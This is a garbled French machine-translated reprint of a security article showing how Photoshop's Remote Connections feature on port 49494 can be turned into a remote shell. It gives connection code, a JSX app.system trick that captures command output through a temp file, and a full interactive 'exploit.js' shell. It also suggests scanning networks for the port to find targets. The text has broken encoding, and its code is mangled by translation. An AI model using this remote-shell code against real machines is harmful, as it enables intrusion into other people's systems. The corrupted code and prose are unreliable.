Comment Photoshop transform� en un outil de contr�le � distance (RAT) pour tirer profit de (r�impression)

Gr�ce � la transformation de l'utilisation de la connectivit� � distance Photoshop dans cet article, et finalement prendre le contr�le de la connectivit� � distance extr�mit� ouverte Photoshop du syst�me d'exploitation.

Fonction de connexion � distance Photoshop

Photoshop a une option connexion � distance (Connexions � distance) du nom de cette fonction est d�sactiv�e par d�faut, mais si vous activez la fonction et de d�finir un mot de passe, celui qui conna�t le mot de passe peut acc�der � distance � votre ordinateur � Photoshop serveur. Ouvrez l'�cran suivant:

utilisateur normal utilise cette fonction pour afficher un aper�u en direct l'apparition de fichier diff�rents styles de PS sur la conception r�elle ou comme dispositif mobile � distance iPad, les t�l�phones fonction de pr�visualisation � distance et d'autres terminaux mobiles doivent installer des tiers tels que l'APP PS Playon Skala Preview et autres connect�. Tels que Skala Preview:

L'exemple est bas� sur le script JSX de connectivit� � distance dans Photoshop. JSX est un script macro Photoshop, �crit par Javascript pour atteindre les fonctions de chargement d'image Photoshop, rendu des couleurs, dessin vectoriel et d'exportation, vous pouvez �crire JSX Cliquez ici pour voir les sp�cifications et les interfaces disponibles.

En outre, Adobe propose une biblioth�que open source CORE g�n�rateur pour �tablir la connexion � distance, donc si vous �tes int�ress� par les d�tails de l'accord, mais aussi Cliquez ici pour voir. Lors de l'activation des connexions � distance, Photoshop �coute sur le port 49494:

Netstat $ -an | grep 49494 tcp40 0 * 0,49494 *. * LISTEN

Le code suivant est utilis� avec un code Photoshop serveur distant � l'interaction Authentifier:

= Const de base n�cessitent ( "g�n�rateur de noyau / lib / g�n�rateur") Options const = { h�te: '192.168.1.123', Mot de passe: 'password', Port: 49494 } const = core.createGenerator g�n�rateur () generator.start (options) .done (() = > �{ generator.evaluateJSXString ( 'alert ( "Bonjour")'). puis (() = > �generator.shutdown ()) })

� cet �gard, j'ai essay� de commandes du syst�me d'appel � l'aide de la m�thode suivante app.system:

alerte (app.system ( "id"))

Malheureusement, une partie de sa valeur de retour est l'�tat de sortie, au lieu de la sortie de commande standard. Apr�s la recherche, j'ai trouv� le script JSX dans Photoshop avec une interface d'acc�s au syst�me, donc de cette fa�on, nous pouvons mettre le contenu de sa sortie standard (stdout) est redirig�e vers un fichier temporaire, apr�s quoi vous pouvez lire le fichier. Comme suit:

var TMPFILE = Folder.temp + 'output.txt'; app.system ( � id > �� + TMPFILE); stdout var = new File ($ {TMPFILE}); stdout.open ( 'r'); stdout.encoding = "UTF-8"; teneur en var = stdout.read (); stdout.close (); stdout.remove (); alerte (contenu);

moulage de r�forme Photoshop RAT

Je peux donc apporter les modifications suivantes dans le code d'authentification ci-dessus, connectez-vous au serveur Photoshop par nom d'utilisateur et le mode de mot de passe, apr�s les scripts JSX r�utilisation Interface ex�cution indirecte des commandes du syst�me de serveur Photoshop, prise en charge directe du syst�me de serveur Photoshop � distance contr�le. Ce qui suit est l'exploit des codes:

exploit.js:

= Const readline exigent ( 'readline') const porte d�rob�e = require ( "g�n�rateur de noyau / lib / g�n�rateur") Options const = { h�te: '192.168.0.101', Mot de passe: 'password', Port: 49494, } console.info ( 'Etablissement de la connexion �' + options.host) const = backdoor.createGenerator g�n�rateur () generator.start (options) .done (() = > �{ const rl = readline.createInterface ({entr�e: process.stdin, sortie: process.stdout, invite: ' > �� }) .on ( 'line', ligne = > �{ laisser command = line.trim () laisser TMPFILE = `Folder.temp + $ {JSON.stringify (Math.random () + 'txt')}` laisser jsx = ` app.system ( � $ {commande} > �� + $ {TMPFILE}); stdout var = new File ($ {TMPFILE}); stdout.open ( 'r'); stdout.encoding = "UTF-8"; teneur en var = stdout.read (); stdout.close (); stdout.remove (); content ` generator.evaluateJSXString (jsx) .puis (output = > �{ console.log (sortie) rl.prompt () }) }) .on ( 'SIGINT', () = > �{ console.log ( 'bye') generator.shutdown () rl.close () }) console.log ( 'shell � distance Photoshop') rl.prompt () })

Apr�s utilisation r�ussie, lire le mot de passe du syst�me d'exploitation de serveur distant Photoshop:

Analyse d'impact

Y compris le r�seau, vous pouvez scanner le port 49494 ou � _photoshopserver.tcp � DNS multicast Ethereal pour d�tecter certaines des fonctionnalit�s de Photoshop ouvrir le serveur de connexion � distance, apr�s avoir utilis� les exploit.js ci-dessus jouer par.

De cette fa�on, la fonction RAT d'utilisation, Pr�misse doit conna�tre le mot de passe Photoshop services connexion � distance, et ne lui appartient donc pas � la cat�gorie de vuln�rabilit�. Sur cette base, s'il vous pla�t ouvrir votre connectivit� � distance prudente Photoshop ou stricte sauvegarde votre mot de passe de connexion � distance Photoshop, sinon, votre syst�me d'exploitation est probablement contr�le � distance malveillante.

* R�f�rence Source: moyenne, FREEBUF nuages Xiao Bian compil�, reproduit � partir FreeBuf.COM �

Route de la soie

Apprenez � conna�tre la Chine

Comment Photoshop transform� en un outil de contr�le � distance (RAT) pour tirer profit de (r�impression)